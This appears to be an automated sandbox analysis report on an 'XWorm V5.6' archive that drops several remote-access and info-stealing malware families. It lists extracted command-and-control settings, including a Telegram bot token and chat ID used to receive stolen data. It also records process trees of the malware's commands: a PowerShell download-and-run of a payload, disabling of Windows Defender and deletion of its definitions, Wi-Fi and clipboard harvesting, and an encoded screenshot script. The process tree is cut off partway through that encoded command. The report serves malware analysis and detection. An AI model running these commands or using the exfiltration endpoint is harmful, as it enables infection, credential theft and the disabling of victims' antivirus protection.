Analysis

  • max time kernel
    101s
  • max time network
    105s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20250113-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20250113-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    26-01-2025 14:41

General

  • Target

    XWorm V5.6.rar

  • Size

    22.9MB

  • MD5

    53d050391cb06fce1ea774f183accd92

  • SHA1

    e63d283faaa9140366435bc7c118858564f5da29

  • SHA256

    d76170f4f50b6ec46f1e98734d2c40f59a71ed1c20432bd8a9ddd4e1b34fd2a9

  • SHA512

    3b1b55e3f6ea711284e4334cbb612645698ae5af64b299b2419375d9a872f1cdf60bbb1ef10bf7600b03d9b43c948617be000766ae96353cdb24b531bb9d16e2

  • SSDEEP

    393216:OxUmZ75UDU6Lr+0HMJO+8w26tL1R8syB1fWbAtGrGdy5Y4TGp4oesyFw7uStyJAS:OFgU6Ly0wn8pgLr8syBQAtGZKpOYBh61

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/kh4liddx/KH4LIDDX/releases/download/KH4LIDDX/csrss.exe

Extracted

Family

asyncrat

Botnet

Default

C2

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

https://api.telegram.org/bot8175192176:AAHZuZ0-rHS66YSwsvh8-gQjbZYSbY3IyXo/sendMessage?chat_id=7537927256

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

xworm

Version

5.0

Mutex

uoqo0jDHykn623lG

Attributes
  • Install_directory

    %Public%

  • install_file

    SystemSettings.exe

  • pastebin_url

    https://pastebin.com/raw/4zaiEtZS

  • telegram

    https://api.telegram.org/bot8175192176:AAHZuZ0-rHS66YSwsvh8-gQjbZYSbY3IyXo/sendMessage?chat_id=7537927256

aes.plain

Extracted

Family

gurcu

C2

https://api.telegram.org/bot8175192176:AAHZuZ0-rHS66YSwsvh8-gQjbZYSbY3IyXo/sendDocument?chat_id=7537927256&caption=====%20RL%20STEALER%20====%20%0A%E2%8F%B0%20Date%20=%3E%2001/26/2025%202:45%0A%F0%9F%92%BBSystem%20=%3E%20Windows%2010%20Enterprise%20LTSC%20(64%20Bit)%0A%F0%9F%91%A4%20User%20=%3E%20Admin%0A%F0%9F%86%94%20PC%20=%3E%20UKTNMTZV%0A%F0%9F%8F%B4%20Country%20=%3E%20[United%20Kingdom]%0A%F0%9F%94%8D%20IP%20=%3E%20181.215.176.83%0A%F0%9F%93%9D%20Language%20=%3E%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0A%F0%9F%94%93%20Antivirus%20=%3E%20Windows%20Defender.%0A%20====%7B%20User%20Data%20%7D====%0A%F0%9F%93%82%20FileGrabber%20=%3E%2014%0A%F0%9F%93%A6%20Telegram%20=%3E%20%E2%9D%8C%0A%F0%9F%92%B8%20Wallets%20=%3E%20%E2%9D%8C%0A%F0%9F%92%AC%20Discord%20=%3E%20%E2%9D%8C%0A%F0%9F%93%A1%20FileZilla:%20%E2%9D%8C%0A%20VimeWorld%20=%3E%20%E2%9D%8C%0A%20====%7B%20VPN%20%7D====%0A%20%E2%88%9F%20NordVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20OpenVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20ProtonVPN%20=%3E%20%E2%9D%8C%0A%20====%7B%20Browsers%20Data%20%7D====%0A%F0%9F%97%9D%20Passwords%20=%3E%200%0A%F0%9F%95%91%20History%20=%3E%200%0A%F0%9F%8D%AA%20Cookies%20=%3E%200%0A%F0%9F%93%9D%20AutoFills%20=%3E%200%0A%F0%9F%92%B3%20CC%20=%3E%200%0A%20====%7B%20Gaming%20%7D====%0A%20%F0%9F%8E%AE%20Steam%20=%3E%20%E2%9D%8C%0A%20==================%0A%20DOMAINS%20DETECTED:%0A%20-%2

https://api.telegram.org/bot8175192176:AAHZuZ0-rHS66YSwsvh8-gQjbZYSbY3IyXo/sendMessage?chat_id=7537927256

https://api.telegram.org/bot8175192176:AAHZuZ0-rHS66YSwsvh8-gQjbZYSbY3IyXo/sendDocument?chat_id=753792725

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Deletes Windows Defender Definitions 2 TTPs 1 IoCs

    Uses mpcmdrun utility to delete all AV definitions.

  • Detect Xworm Payload 1 IoCs
  • Gurcu family
  • Gurcu, WhiteSnake

    Gurcu aka WhiteSnake is a malware stealer written in C#.

  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 4 IoCs
  • Stormkitty family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file 1 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 10 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 8 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 14 IoCs
  • Looks up external IP address via web service 7 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Drops file in System32 directory 2 IoCs
  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • UPX packed file 58 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 4 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 2 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\XWorm V5.6.rar"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:1460
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:1876
    • C:\Users\Admin\Desktop\XWorm V5.6\XWorm V5.6.exe
      "C:\Users\Admin\Desktop\XWorm V5.6\XWorm V5.6.exe"
      1⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:228
      • C:\Users\Admin\AppData\Local\Temp\XWorm V5.6.exe
        "C:\Users\Admin\AppData\Local\Temp\XWorm V5.6.exe"
        2⤵
        • Executes dropped EXE
        • Enumerates system info in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:3644
      • C:\Users\Public\SystemSettings.exe
        "C:\Users\Public\SystemSettings.exe"
        2⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Drops file in System32 directory
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2692
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\SystemSettings.exe'
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2912
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SystemSettings.exe'
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5068
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://github.com/kh4liddx/KH4LIDDX/releases/download/KH4LIDDX/csrss.exe','C:\Users\Admin\AppData\Local\Temp\csrss.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\csrss.exe'
        2⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2988
        • C:\Users\Admin\AppData\Local\Temp\csrss.exe
          "C:\Users\Admin\AppData\Local\Temp\csrss.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:3656
          • C:\Users\Admin\AppData\Local\Temp\Zip-7.exe
            "C:\Users\Admin\AppData\Local\Temp\Zip-7.exe"
            4⤵
            • Executes dropped EXE
            • Drops desktop.ini file(s)
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            • Suspicious use of AdjustPrivilegeToken
            PID:1872
            • C:\Windows\SysWOW64\cmd.exe
              "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
              5⤵
              • System Location Discovery: System Language Discovery
              • System Network Configuration Discovery: Wi-Fi Discovery
              PID:5936
              • C:\Windows\System32\Conhost.exe
                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                6⤵
                  PID:5696
                • C:\Windows\SysWOW64\chcp.com
                  chcp 65001
                  6⤵
                  • System Location Discovery: System Language Discovery
                  PID:1056
                • C:\Windows\SysWOW64\netsh.exe
                  netsh wlan show profile
                  6⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  • System Network Configuration Discovery: Wi-Fi Discovery
                  PID:2444
                • C:\Windows\SysWOW64\findstr.exe
                  findstr All
                  6⤵
                  • System Location Discovery: System Language Discovery
                  PID:5932
              • C:\Windows\SysWOW64\cmd.exe
                "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                5⤵
                • System Location Discovery: System Language Discovery
                PID:5568
                • C:\Windows\SysWOW64\chcp.com
                  chcp 65001
                  6⤵
                  • System Location Discovery: System Language Discovery
                  PID:1020
                • C:\Windows\SysWOW64\netsh.exe
                  netsh wlan show networks mode=bssid
                  6⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:5564
            • C:\Users\Admin\AppData\Roaming\7-Zip.exe
              "C:\Users\Admin\AppData\Roaming\7-Zip.exe"
              4⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:1992
              • C:\Users\Admin\AppData\Roaming\7-Zip.exe
                "C:\Users\Admin\AppData\Roaming\7-Zip.exe"
                5⤵
                • Drops file in Drivers directory
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:5012
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\7-Zip.exe'"
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1852
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\7-Zip.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2016
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2136
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1392
                  • C:\Program Files\Windows Defender\MpCmdRun.exe
                    "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                    7⤵
                    • Deletes Windows Defender Definitions
                    PID:5148
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'"
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3776
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4232
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2088
                  • C:\Windows\system32\tasklist.exe
                    tasklist /FO LIST
                    7⤵
                    • Enumerates processes with tasklist
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4016
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2312
                  • C:\Windows\system32\tasklist.exe
                    tasklist /FO LIST
                    7⤵
                    • Enumerates processes with tasklist
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1296
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2140
                  • C:\Windows\System32\Wbem\WMIC.exe
                    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                    7⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:5316
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                  6⤵
                  • Clipboard Data
                  PID:3860
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell Get-Clipboard
                    7⤵
                    • Clipboard Data
                    PID:5596
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                  6⤵
                    PID:1776
                    • C:\Windows\system32\tasklist.exe
                      tasklist /FO LIST
                      7⤵
                      • Enumerates processes with tasklist
                      PID:5588
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                    6⤵
                    • System Network Configuration Discovery: Wi-Fi Discovery
                    PID:2964
                    • C:\Windows\system32\netsh.exe
                      netsh wlan show profile
                      7⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Network Configuration Discovery: Wi-Fi Discovery
                      PID:5500
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    6⤵
                      PID:4592
                      • C:\Windows\system32\tree.com
                        tree /A /F
                        7⤵
                          PID:5460
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "systeminfo"
                        6⤵
                        • Suspicious use of WriteProcessMemory
                        PID:548
                        • C:\Windows\system32\systeminfo.exe
                          systeminfo
                          7⤵
                          • Gathers system information
                          PID:5408
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                        6⤵
                          PID:1664
                          • C:\Windows\system32\reg.exe
                            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                            7⤵
                              PID:5424
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                            6⤵
                            • Suspicious use of WriteProcessMemory
                            PID:1208
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgAC